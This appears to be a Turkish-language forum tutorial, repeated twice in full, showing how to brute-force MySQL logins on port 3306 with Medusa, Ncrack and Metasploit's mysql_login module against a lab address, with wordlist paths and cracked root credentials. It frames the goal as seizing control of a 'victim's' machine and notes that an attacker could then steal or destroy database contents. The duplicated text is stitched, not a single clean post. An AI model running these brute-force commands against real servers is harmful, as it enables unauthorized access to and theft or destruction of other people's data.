● 3306 Numaralı bağlantı noktası üzerinden mysql servisi arcılığıyla mağdurun PC'sinde nasıl kontrol altına alınacağını öğreneceğiz !
● Medusa :
Medusa'nın hızlı, kitlesel olarak paralel, modüler, girişli bir kaba-zorlayıcı olması amaçlanmıştır. Birkaç protokolü destekler: AFP, CVS, FTP, HTTP, IMAP, rlogin, SSH, Subversion ve VNC birkaç isimAşağıdaki komutu çalıştırın :
KOD :
$ medusa -h 192.168.1.106 –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M mysql
-U: kullanıcı adı listesi için yolu gösterir
-P: şifre listesi için yolu gösterir
Gördüğünüz gibi, mysql kullanıcı adını başarılı bir şekilde root ve şifre olarak aldık
● Ncrack :
Ncrack, yüksek hızlı ağ kimlik doğrulaması çatlama aracıdır. Tüm ev sahiplerini ve ağ aygıtlarını zayıf parolalar için proaktif olarak test ederek şirketlerin ağlarını güvenli hale getirmelerine yardımcı olmak için oluşturuldu. Aşağıdaki komutu çalıştırın :
KOD :
$ ncrack –v –U /root/Desktop/user.txt–P /root/Desktop/pass.txt 192.168.1.106:3306
-U: kullanıcı adı listesi için yolu gösterir
-P: şifre listesi için yolu gösterir
Gördüğünüz gibi, mysql kullanıcı adını başarılı bir şekilde todo olarak root ve şifre olarak aldık .
● Metasploit :Bu modül, sadece belirli bir kullanıcı / geçiş için MySQL örneğini sorgular (varsayılan değer boştur).
KOD :
msf > use auxiliary/scanner/mysql/mysql_login
msf auxiliary(mysql_login) > set rhosts 192.168.1.106
msf auxiliary(mysql_login) > set user_file /root/Desktop/users.txt
msf auxiliary(mysql_login) > set pass_file /root/Desktop/password.txt
msf auxiliary(mysql_login) > set stop_on_success true
msf auxiliary(mysql_login) > run
Bu, kaba kuvvet saldırısı başlatır ve kullanıcı.txt ve pass.txt dosyasını kullanarak geçerli kullanıcı adı ve parola kombinasyonunu eşleştirmeye çalışır. Verilen görüntüden mysql sunucumuzun kaba kuvvet saldırısına karşı güvende olmadığını görebilirsiniz, çünkü kullanıcı adı: root ve password: toor girişi için eşleştirme kombinasyonunu gösterir . Saldırgan geçerli kimlik bilgilerini aldıktan sonra veritabanı bilgilerini çalmak ya da yok etmek için doğrudan mysql sunucusuna giriş yapabilir.
■ OKUDUĞUNUZ İÇİN TEŞEKKÜR EDERİM ...
■BİRŞEYLER KATABİLDİYSEM NE MUTLU BANA...
■ANLAMADIĞINIZ YERDE E - POSTA ATABİLİRSİNİZ YADA YORUMLARDA BELİRTİNİZ ...
● Medusa :
Medusa'nın hızlı, kitlesel olarak paralel, modüler, girişli bir kaba-zorlayıcı olması amaçlanmıştır. Birkaç protokolü destekler: AFP, CVS, FTP, HTTP, IMAP, rlogin, SSH, Subversion ve VNC birkaç isimAşağıdaki komutu çalıştırın :
KOD :
$ medusa -h 192.168.1.106 –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M mysql
-U: kullanıcı adı listesi için yolu gösterir
-P: şifre listesi için yolu gösterir
Gördüğünüz gibi, mysql kullanıcı adını başarılı bir şekilde root ve şifre olarak aldık
● Ncrack :
Ncrack, yüksek hızlı ağ kimlik doğrulaması çatlama aracıdır. Tüm ev sahiplerini ve ağ aygıtlarını zayıf parolalar için proaktif olarak test ederek şirketlerin ağlarını güvenli hale getirmelerine yardımcı olmak için oluşturuldu. Aşağıdaki komutu çalıştırın :
KOD :
$ ncrack –v –U /root/Desktop/user.txt–P /root/Desktop/pass.txt 192.168.1.106:3306
-U: kullanıcı adı listesi için yolu gösterir
-P: şifre listesi için yolu gösterir
Gördüğünüz gibi, mysql kullanıcı adını başarılı bir şekilde todo olarak root ve şifre olarak aldık .
● Metasploit :Bu modül, sadece belirli bir kullanıcı / geçiş için MySQL örneğini sorgular (varsayılan değer boştur).
KOD :
msf > use auxiliary/scanner/mysql/mysql_login
msf auxiliary(mysql_login) > set rhosts 192.168.1.106
msf auxiliary(mysql_login) > set user_file /root/Desktop/users.txt
msf auxiliary(mysql_login) > set pass_file /root/Desktop/password.txt
msf auxiliary(mysql_login) > set stop_on_success true
msf auxiliary(mysql_login) > run
Bu, kaba kuvvet saldırısı başlatır ve kullanıcı.txt ve pass.txt dosyasını kullanarak geçerli kullanıcı adı ve parola kombinasyonunu eşleştirmeye çalışır. Verilen görüntüden mysql sunucumuzun kaba kuvvet saldırısına karşı güvende olmadığını görebilirsiniz, çünkü kullanıcı adı: root ve password: toor girişi için eşleştirme kombinasyonunu gösterir . Saldırgan geçerli kimlik bilgilerini aldıktan sonra veritabanı bilgilerini çalmak ya da yok etmek için doğrudan mysql sunucusuna giriş yapabilir.
■ OKUDUĞUNUZ İÇİN TEŞEKKÜR EDERİM ...
■BİRŞEYLER KATABİLDİYSEM NE MUTLU BANA...
■ANLAMADIĞINIZ YERDE E - POSTA ATABİLİRSİNİZ YADA YORUMLARDA BELİRTİNİZ ...
